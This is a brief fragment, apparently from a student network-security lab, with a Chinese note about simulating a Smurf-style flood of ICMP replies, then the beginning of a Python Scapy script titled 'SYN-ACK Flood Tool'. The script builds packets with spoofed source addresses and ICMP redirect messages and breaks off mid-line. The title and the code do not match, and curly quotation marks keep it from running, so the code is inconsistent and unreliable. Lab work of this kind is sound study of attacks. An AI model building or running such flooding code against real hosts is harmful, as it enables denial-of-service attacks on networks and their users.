文档上摘抄,须解释拓扑无法做到高数量的主机在局域网内,所以跳过攻击者在局域网内广播ICMP请求包的过程,直接模拟其他主机被误导后对样机发送多数量的ICMP响应报文
#!/usr/bin/python
Zhoushukang
zhoushukang@zju.edu.cn
SYN-ACK Flood Tool Python
from multiprocessing import Process
from scapy.all import *
import os
import sys
import random
def randomIP():
ip = “.”.join(map(str, (random.randint(0, 255) for _ in range(4))))
return ip
def randInt():
x = random.randint(1000, 9000)
return x
def SYN_ACK_Flood(dstIP, src_netgate_IP, attack_IP, counter):
total = 0
print(“Packets are sending …”)
for x in range(0, counter):
# 构建IP数据包,指定目标IP地址
ip_packet = IP(src=src_netgate_IP, dst=dstIP)
# 构建ICMP重定向报文
icmp_redirect = ICMP(type&